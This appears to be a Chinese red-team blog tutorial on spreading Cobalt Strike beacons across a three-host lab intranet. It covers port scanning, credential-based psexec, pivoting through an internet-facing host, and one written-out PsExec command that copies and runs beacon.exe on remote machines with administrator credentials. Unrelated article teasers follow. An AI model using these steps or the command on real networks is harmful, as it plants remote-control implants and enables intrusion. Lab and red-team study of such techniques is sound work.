Cobalt Strike内网环境批量上线

0x00 环境

环境:

windows 2008:192.168.241.171
windows 2008 x2:192.168.241.172
windows 7:192.168.241.156

0x01 内网可出网情况

首先windows7上线了,执行一波portscan

点击视图->目标可以看到扫出来开发的机子

获取登录密码通过cs自带的psexec执行ipc$批量

选中要进行测试的机子

选择对应的凭证

选择会话(补图)

等上线就好

0x02 内网不可出网情况

先将可出网的一台机设置中转

生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令

PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\Windows\Temp\beacon.exe
  • 1

等上线

在上线成功的机子上可以看到是通过192.168.241.156这台机的4444端口流量出网的

ssh批量登录的方法和图1差不多

文章来源:https://422926799.github.io/posts/b9889b8f.html

无害实验室sec

研究方向:WEB渗透,红蓝对抗,CTF,暂不接广告谢谢
24篇原创内容
公众号

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

无害实验室拥有对此文章的修改和解释权

无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的

(0)

相关推荐

  • 在购买机子时,你会注意以下问题么?

    购买手机,选择哪种渠道.这个问题一直深深着徘徊着我们.有的人喜欢去官网进行抢购.有的人喜欢去线下购买.有的喜欢去京东天猫和淘宝这些电商平台. (数据来自"国庆购机民意调查") 经过 ...

  • 年青人的第一台120相机——富士 GF670 | keroro光

    这里先允许我厚着脸皮称自己为年轻人,入胶片坑到今年刚好10年,前几年一直是用135的胶片单反胶片旁轴.当年对四五千块的120哈苏禄来不屑一顾,心想又重又大,胶卷还那么贵,我这辈子都不玩120相机. 刚 ...

  • 2020文章精选合辑

    2020年, 在这特殊的一年, 我们举办了丰富的线上活动.讲座, 也为大家分享了很多在线.在家学习资源. 我们在这里为您整理了全年推送的文章精选合辑, 让您不错过每一份精彩! 也希望这些观点.思想.理 ...

  • “抹黑”百度有风险,自媒体酷玩实验室被判赔偿百度14万元

    作为BAT中的一员,百度是国内互联网企业的巨头,不过与腾讯.阿里相比,百度因为在搜索引擎付费排名上劣迹斑斑,口碑一向不太好,不仅被传统媒体批判过,百度也是诸多自媒体最喜欢写文章的材料来源.只不过在骂百 ...

  • 全网最全的Cobalt Strike使用教程-内网渗透之信息收集篇

    一.前言 从本篇文章开始,斗哥将向大家详细的介绍cobalt Strike 这款工具在内网渗透中的具体使用方式,因为涉及的内容较多,大致会分为信息收集篇.横向渗透篇.域控攻击篇.权限维持篇,在本篇文章 ...

  • 内网基础知识及域环境搭建

    前言 民国三年等不到一场雨,此生等不到表哥一句我带你. 目录 * 1.工作组 * 2.域 * 3.活动目录 * 4.安全域的划分 * 5.域中计算机的分类 * 6.域内权限 * 7.A-G-DL-P策 ...

  • 批量自动激活内网所有Windows和Office思路详解

    Windows和Offic无需输入KEY,只要支持KMS激活的版本就可以.连接内网后自动激活Windows和Offic.无需人工干预.下图是连上内网后自动激活的Windows.Windows10已经不 ...

  • MoveKit:一款功能强大的Cobalt Strike横向渗透套件

    转自freebuf 关于MoveKit MoveKit是一款功能强大的Cobalt Strike横向渗透套件,本质上来说MoveKit是一个Cobalt Strike扩展,它利用的是SharpMove ...

  • 无需安装,仅需 1 条指令,秒实现内网穿透的神器 Serveo

    leafcho阅52转02020-05-19分享收藏概述 Serveo工作原理当用户通过 SSH 连接到 Serveo 时会与该网站建立一个远程代理,Serveo 随后会生成一个 公共 URL,任何人 ...

  • Metasploit-framework 内网穿透:多场景详解

    李逍遥g FreeBuf 今天 前言 对于一名合格的网络安全从业者来说,Metasploit-framework是必会不可的工具,大大降低了exploit的利用门槛. 但在实战中,复杂的网络环境以及防 ...

  • 巢内网

    胃里长息肉有癌变可能,但是癌变概率比较低.多数的胃息肉是炎性的息肉,属于良性的改变,如果比较小,患者也没有特殊不适的症状,一般不会发生癌变.但如果息肉比较大,产生了恶心.呕吐.腹痛.腹泻等症状,或患者 ...

  • 这是最近内网最火的一篇文章——阿里职场的“潜”规则

    前言: 写这篇文的原题是<阿里职场潜规则>希望小白们尽快学会规则,利用规则,不对味儿就早点出火坑,对味儿了就往死里干,人这辈子青春与汗水是有限的,如果换不回理想那换些臭钱也行. 正确分析事 ...

  • Debian/Ubuntu 安装bcm43142无线网卡驱动 | LinkNPS内网穿透

    Debian/Ubuntu 安装bcm43142无线网卡驱动 By admin 2020年6月12日 技术文章 Drivers for Broadcom BCM43142 wireless card ...